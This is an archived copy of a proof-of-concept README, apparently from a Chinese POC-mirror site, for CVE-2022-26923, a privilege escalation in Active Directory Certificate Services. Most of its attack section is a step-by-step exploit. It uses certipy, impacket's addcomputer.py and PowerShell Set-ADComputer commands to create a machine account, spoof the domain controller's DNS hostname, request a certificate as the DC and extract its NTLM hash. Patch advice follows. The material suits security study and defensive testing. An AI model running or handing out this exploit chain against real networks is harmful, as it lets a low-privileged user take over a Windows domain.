POC详情: b72d666635713ed0453da18f5660fea0bc093bee

来源
https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services
关联漏洞
标题: Microsoft Windows Active Directory 信任管理问题漏洞 (CVE-2022-26923)
描述:Microsoft Windows Active Directory是美国微软(Microsoft)公司的一个负责架构中大型网络环境的集中式目录管理服务。存储有关网络上对象的信息,并使管理员和用户可以轻松查找和使用这些信息。 Microsoft Windows Active Directory存在信任管理问题漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Syst
描述
The vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.
介绍
# CVE-2022-26923 AD Certificate Services

* **Date of publication** : 10/05/2022  
* Attack complexity: Low
* Privileges required: Low
* **CVSS Score :** <span style='color:red;'>8.1</span>   


The vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.

An exploit was developed by Oliver Lyak (ly4k_) in Python and was published before and not after the advisory. It is declared as proof-of-concept. The exploit is available for download at research.ifcr.dk.

**Source :**
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
- https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
- https://vuldb.com/fr/?id.199368


## Description 
The newly revealed Active Directory Domain privilege escalation flaw hasn’t been yet exploited in the wild, still its high 8.8. CVSS score points to a high risk it poses to the compromised systems enabling attackers to abuse the certificate issues. CVE-2022–26923 allows manipulating the DnsHostName attribute, which specifies the computer name as it is registered in DNS, and then enables an adversary to obtain a certificate from the AD Certificate Services, potentially leading to elevation of privilege.

## POC

        - Username: user_test
        - Password: Password123#
        - Domain: my.domain.com
        
        To reproduce you must: 
        - Have impacket and certipy installed on the attacking machine.
          - https://github.com/SecureAuthCorp/impacket
          - https://github.com/ly4k/Certipy
        - Have compromised a user with low privilege. 
        - A system is vulnerable only if Active Directory Certificate Services is running on the domain.

1. Let's start by generating a certificate for our low privilege AD user (Username=user_test Password=Password123#) using the certificate template User : 
    ````
    certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
    ````
    
2. Let's check that the certificate is valid and that it can be used for Kerberos authentication via Certipy :
    ````
    certipy auth -pfx user_test.pfx
    ````
    
3. Adding a virtual computer to the domain with Impacket
    ````
    addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'

    # my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
    # method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
    # computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
    # computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
    ````  
    
4. Let's generate a certificate for the new computer we created. To use the machine account of said computer, you need to add a "$" at the end of the name:
    ````
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    ````
    
5. On the compromised machine, updating the DNS Hostname and SPN Attributes :
    ````
    PS C:\Users\user_test> Get-ADComputer NEW_PC -properties dnshostname,serviceprincipalname
    ````
    
6. Remove our current SPN attribute
    ````
    PS C:\Users\user_test> Set-ADComputer NEW_PC -ServicePrincipalName @{}
    ````
    
7. Try to set the DNS hostname attribute to that of the DC:
    ````
    PS C:\Users\user_test> Set-ADComputer NEW_PC -DnsHostName HOSTANME.my.domain.com
    ````
    
8. On the attacking machine, forging a Malicious Certificate
    ````
    certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
    ````
    
9. Verify that this certificate is working and will return the NTLM hash
    ````
    certipy auth -pfx hostname.pfx
    ````
  
## Mitigations and Fixes

For CVE-2022–26923 mitigation and protective measures, Microsoft strongly recommends updating all servers that run AD Certificate Services and Windows domain controllers operating certificate-based authentication to the latest May 10 version. 

- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
文件快照

 [4.0K]  /data/pocs/b72d666635713ed0453da18f5660fea0bc093bee
└── [4.5K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。